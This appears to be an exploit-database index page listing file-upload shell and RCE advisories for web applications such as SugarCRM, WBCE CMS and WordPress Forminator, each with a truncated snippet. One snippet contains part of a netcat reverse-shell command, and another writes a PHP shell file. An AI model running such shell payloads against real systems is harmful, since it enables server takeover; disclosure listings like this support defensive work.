Wallos Shell Upload Vulnerability

Exploit Title: Wallos - File Upload RCE Authenticated Date: 2024-03-04 Exploit Author: email protected Vendor Homepage: https://github.com/ellite/Wallos Software Link: https://github.com/ellite/Wallos Version: -----------------------------2925144213...

Petrol Pump Management Software 1.0 Shell Upload

Exploit Title: Petrol pump management software - File Upload Remote Code Execution RCE unauthenticated Google Dork: N/A Application: Petrol pump management software Date: 20.02.2024 Bugs: File Upload Remote Code Execution RCE unauthenticated Exploit Author: SoSPiro Vendor Homepage:...

Adapt CMS 3.0.3 Cross Site Scripting / Shell Upload Vulnerabilities

Exploit Title: Stored XSS and RCE - adaptcmsv3.0.3 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Ubuntu 22.04 Blog: http://msecureltd.blogspot.com Description - It was found that adaptcms v3.0.3 was vulnerable to stored cross site scripting - Also the application allowed the file uploa...

Exploit for Missing Authorization in Wpexperts Post_Smtp

What the exploit does - Places a token that allows you to vie...

CVE-2023-6675

Unrestricted Upload of File with Dangerous Type vulnerability in National Keep Cyber Security Services CyberMath allows Upload a Web Shell to a Web Server.This issue affects CyberMath: from v.1.4 before v.1.5...

WBCE CMS 1.6.1 Shell Upload

Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution Date: 30/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCECMS/archive/refs/tags/1.6.1.zip Version: 1.6.1 Tested on: https://www.softaculous.com/apps/cms/WBCECMS POC: 1...

Online Student Clearance System 1.0 Shell Upload Exploit

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

SugarCRM 13.0.1 Shell Upload

------------------------------------------------------------------------------- SugarCRM = 13.0.1 setnoteattachment Unrestricted File Upload Vulnerability ------------------------------------------------------------------------------- - Software Link: https://www.sugarcrm.com - Affected Versions:...

CVE-2023-4827

The File Manager Pro WordPress plugin before 1.8 does not properly check the CSRF nonce in the fsconnector AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell...

BoidCMS 2.0.0 Shell Upload

!/usr/bin/python3 Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability Date: 08/21/2023 Exploit Author: 1337kid Vendor Homepage: https://boidcms.github.io// Software Link: https://boidcms.github.io/BoidCMS.zip Version: ' with open'shell.php','w' as f: f.writelinesphpcode ====...

Online ID Generator 1.0 - Remote Code Execution Vulnerability

Title: Online ID Generator 1.0 - Remote Code Execution RCE Author: nu11secur1ty Vendor: https://www.youtube.com/watch?v=JdB9po5DTc Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/idgenerator0.zip Reference: https://portswigger.net/web-security/sql-injection...

Exploit for Code Injection in Vmware Spring_Framework

Spring4Shell: CVE-2022-22965 RCE Java Spring framework RCE...

Exploit for Path Traversal in Jorani

CVE-2023-26469 REC PoC This repository contains an exploit s...

InterPhoto 2.3.0 Shell Upload

==================================================================================================================================== | Title : InterPhoto 2.3.0 Persians Remote Shell Upload vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser : Mozilla firefox...

Online ID Generator 1.0 SQL Injection / Shell Upload

Title: Online-ID-Generator-1.0-SQLi-Bypass-login-ShellUpload-RCE Author: nu11secur1ty Date: 08/31/2023 Vendor: https://www.youtube.com/watch?v=JdB9po5DTc Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/idgenerator0.zip Reference:...

SugarCRM 12.2.0 Shell Upload Vulnerability

----------------------------------------------------------------- SugarCRM = 12.2.0 Notes Unrestricted File Upload Vulnerability ----------------------------------------------------------------- - Software Link: https://www.sugarcrm.com - Affected Versions: Version 12.2.0 and prior versions...

Emaar Real Estate Agency Directory System 5.7 Shell Upload

==================================================================================================================================== | Title : Emaar – Real Estate Agency Directory System v5.7 Unrestricted File Upload Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro /...

Webutler 3.2 Shell Upload

Exploit Title: Webutler v3.2 - Remote Code Execution RCE Application: webutler Cms Version: v3.2 Bugs: RCE Technology: PHP Vendor URL: https://webutler.de/en Software Link: http://webutler.de/download/webutlerv3.2.zip Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technic...

WordPress Forminator 1.24.6 Shell Upload

Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution Date: 2023-07-20 Exploit Author: Mehmet Kelepçe Vendor Homepage: https://wpmudev.com/project/forminator-pro/ Software Link: https://wordpress.org/plugins/forminator/ Version: 1.24.6 Tested on: PHP - Mysql...

Uvdesk 1.1.3 Shell Upload

Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution RCE Authenticated Date: 28/07/2023 Exploit Author: Daniel Barros @cupc4k3d - Hakai Offensive Security Vendor Homepage: https://www.uvdesk.com Software Link: https://github.com/uvdesk/community-skeleton Version: 1.1.3 Example: python...